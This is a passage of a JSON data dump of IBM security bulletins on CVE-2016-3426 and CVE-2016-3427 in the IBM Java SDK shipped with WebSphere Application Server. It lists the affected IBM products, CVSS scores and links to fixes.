[](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Multi-Enterprise+Integration+Gateway&release=1.0.0.1&platform=All&function=fixId&fixids=IBM_Multi-Enterprise_Integration_Gateway_V1.0.0.1_3_iFix_Media&includeSupersedes=0>)[B2B_Advanced_Communications_V1.0.0.5_1_iFix_Media](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%2FOther%2Bsoftware&product=ibm/Other+software/Multi-Enterprise+Integration+Gateway&release=All&platform=All&function=fixId&fixids=IBM_B2B_Advanced_Communications_V1.0.0.5_1_iFix_Media&includeRequisites=1&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:01:12", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM B2B Advanced Communications (CVE-2016-3427 and CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T20:01:12", "id": "D0DCF925CB843A3DD1CE13BFFE3A9D0AA7622AA1DBECD77AB5105922400050DA", "href": "https://www.ibm.com/support/pages/node/280171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:04", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Security Vulnerability in IBM WebSphere Application Server (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \n \nIBM Content Manager Records Enabler 8.5.0.6 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \n \nIBM Content Manager Records Enabler 8.5.0.7 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:16", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:16", "id": "8CF3082A44DE60C67D8DC18C23EE26D771B4A91C0A12FDF0AA3BEC56135A0739", "href": "https://www.ibm.com/support/pages/node/283841", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:41:39", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the bulletin \"[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\" for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, ClearCase Remote Client (CCRC) WAN server/CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x:**\n\n \nThis vulnerability only applies to the CCRC WAN server component. \n**Versions 7.1.x.x:**\n\n \nThis vulnerability only applies to the CM server component.\n\n## Remediation/Fixes\n\nReview the security bulletin referenced above and apply the relevant fixes to your WAS installation used for ClearCase. \n \n\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.0.x, 7.1.1.x, and 7.1.2.x| [Document 1390803](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) explains how to update WAS for ClearCase CM Servers at release 7.1.x. Consult those instructions when applying the fix. \n8.0.0.x \n8.0.1.x \n9.0.0.x| Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n_For 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-07-10T08:34:12", "id": "A5022E2B14C6CFC69E613237E07A6681EAB204D56E5668D8588C0AE424BB40D9", "href": "https://www.ibm.com/support/pages/node/279651", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:42", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Tivoli System Automation Application Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin \u201c[_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\u201d for further vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli System Automation Application Manager 4.1| WebSphere Application Server 8.5 \nNote that IBM Tivoli System Automation Application Manager 3.2.2, 3.2.1, and 3.2.0 are not affected. \n\n## Remediation/Fixes\n\nYou need to install the corresponding APAR from WebSphere Application Server. Please follow the instructions on this link: [_http://www.ibm.com/support/docview.wss?uid=swg21982223_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>). Please see section \u201cAffected Products and Versions\u201d in this bulletin on details which fix of WebSphere Application Server applies to your version of IBM Tivoli System Automation Application Manager.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:06", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:06", "id": "B8D7C45A7B91FC54907F2A1A1E6B04BDAFBFDF653C7180AD40F4BA7A5091A75B", "href": "https://www.ibm.com/support/pages/node/278329", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:34", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Security Key Lifecycle Manager. Information about a security vulnerability affecting Websphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Remediation/Fixes\n\nUpdate your IBM WebSphere Application Server (WAS) with the appropriate Interim Fix based on information in the WebSphere security bulletin link below: \n\n * To determine your WAS version, use the ` \ntklmVersionInfo` \nCLI command. \n * To determine your Java version, navigate to the install folder <WAS_HOME>/AppServer/java/bin and run ` \njava -fullversion`\n * Principal Product and Version(s)| Affected Supporting Product and Version \n---|--- \n \nIBM Security Key Lifecycle Manager (SKLM) v2.5 on distributed platforms | WebSphere Application Server v8.5.5 \n \nIBM Security Key Lifecycle Manager (SKLM) v2.6 on distributed platforms | WebSphere Application Server v8.5.5.7 \n \n## Workarounds and Mitigations\n\nPlease consult the security bulletin, [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for information about fixes.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T21:41:52", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T21:41:52", "id": "AFAF169974B6AABF6CF7272D4406CAB1EDD15D52DAF28E97FB52D795BB07F8D1", "href": "https://www.ibm.com/support/pages/node/278735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:48", "description": "## Summary\n\nIBM Tivoli Storage Manager FastBack Reporting requires the dependent product IBM WebSphere Application Server. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli Storage Manager Fastback 6.1.0 through 6.1.12.1| IBM WebSphere Application Server 8.5.0.1 Full Profile \nIBM Tivoli Storage Manager Fastback 6.1.12.2 through 6.1.12.3| IBM WebSphere Application Server 8.5.5.4 Full Profile \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server affecting IBM Tivoli Storage Manager FastBack Reporting (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:12", "id": "265C7F39696063EC6C052A835129BE2250A30FFCD1A9F5A46A6025E12F1AEC5A", "href": "https://www.ibm.com/support/pages/node/278553", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:13", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of IBM WebSphere Application Server Full Profile, IBM WebSphere Application Server Liberty Profile, and IBM WebSphere Application Server Hypervisor Edition. \n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but WebSphere Application Server is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to WebSphere Application Server. HP fixes are on a delayed schedule.** \nCVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nIBM Java SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.9. \n\n * This _does not occur_ on IBM Java SDK shipped with WebSphere Application Servers Fix Packs 8.5.5.10\n\n## Remediation/Fixes\n\nTo patch an existing service instance refer to the IBM WebSphere Application Server bulletin: ** ** \n[**Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223&myns=swgws&mynp=OCSSCKBL&mynp=OCSSEQTP&mync=E&cm_sp=swgws-_-OCSSCKBL-OCSSEQTP-_-E>) \n \nAlternatively, delete the vulnerable service instance and create a new instance. The new maintenance will be included.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:38", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect IBM WebSphere Application Server for Bluemix April 2016 CPU (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:38", "id": "9B76461F148C75BB1672D4E6CDC2D3BAB8D5A3142F9FF56BF418C9B0F91B19DF", "href": "https://www.ibm.com/support/pages/node/278895", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T18:40:25", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Maximo Asset Management, Maximo Asset Management Essentials, Maximo Industry Solutions (including Maximo for Energy Optimization, Maximo for Government, Maximo for Nuclear Power, Maximo for Transportation, Maximo for Life Sciences, Maximo for Oil and Gas, and Maximo for Utilities), Maximo Adapter for Primavera, SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Change and Configuration Management Database, and TRIRIGA Energy Optimization. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nMaximo Asset Management 7.6 \nIBM Control Desk 7.6 \nMaximo for Aviation 7.6 \nMaximo for Life Sciences 7.6 \nMaximo for Transportation 7.6| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nMaximo Asset Management 7.5 \nMaximo Asset Management Essentials 7.5 \nMaximo for Government 7.5 \nMaximo for Nuclear Power 7.5 \nMaximo for Transportation 7.5 \nMaximo for Life Sciences 7.5 \nMaximo for Oil and Gas 7.5 \nMaximo for Utilities 7.5 \nMaximo Adapter for Primavera 7.5 \nSmartCloud Control Desk 7.5 \nTRIRIGA Energy Optimization 1.1| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nIBM WebSphere Application Server 8.0 \nIBM WebSphere Application Server 7.0 \nMaximo Asset Management 7.1 \nMaximo Asset Management Essentials 7.1 \nMaximo Asset Management for Energy Optimization 7.1 \nMaximo for Government 7.1 \nMaximo for Nuclear Power 7.1 \nMaximo for Transportation 7.1 \nMaximo for Life Sciences 7.1 \nMaximo for Oil and Gas 7.1 \nMaximo for Utilities 7.1 \nMaximo Adapter for Primavera 7.1| IBM WebSphere Application Server 7.0 \nTivoli Asset Management for IT 7.2 \nTivoli Service Request Manager 7.2 \nChange and Configuration Management Database 7.2| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-22T03:02:31", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with Asset and Service Management (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2022-09-22T03:02:31", "id": "3595219827CBAE62E6C87140158C93E3FA2A013C8BCEC8A5B536BAC89C55BC21", "href": "https://www.ibm.com/support/pages/node/278263", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:06", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Content Manager Records Enabler 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Content Manager Records Enabler 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:04", "id": "07DBE9517A4611E5419E1606D2F71A8201613E4042A34EE495FE116635651800", "href": "https://www.ibm.com/support/pages/node/282285", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:40", "description": "## Summary\n\nEmbedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Integrated Portal. Information about a security vulnerability affecting Embedded Websphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the WAS security bulletin [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details \n \n**_Important Note_**: The Websphere security bulletin above provides the vulnerability details including the steps to remediate. However, it is important to review the **\"Remediation/Fixes\"** section below before reviewing the Websphere bulletin to ensure the TIP specific remediation steps are understood and followed.\n\n## Affected Products and Versions\n\nTivoli Integrated Portal version 2.1 and 2.2 bundling Embedded Websphere Application Server version 7.0 \n\n## Remediation/Fixes\n\nThe Websphere security bulletin above provides a link to the required iFix to remediate the vulnerability. However, the iFix requires either eWAS 7.0.0.31 or higher installed. \nTIP does not support upgrading Websphere fixpack independently. TIP 2.2.0.15 or TIP 2.2.0.17 must be applied which will upgrade eWAS to 7.0.0.31 and above. Once TIP FP has been applied, the Websphere iFix can be applied as described in the Websphere bulletin.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:23:24", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 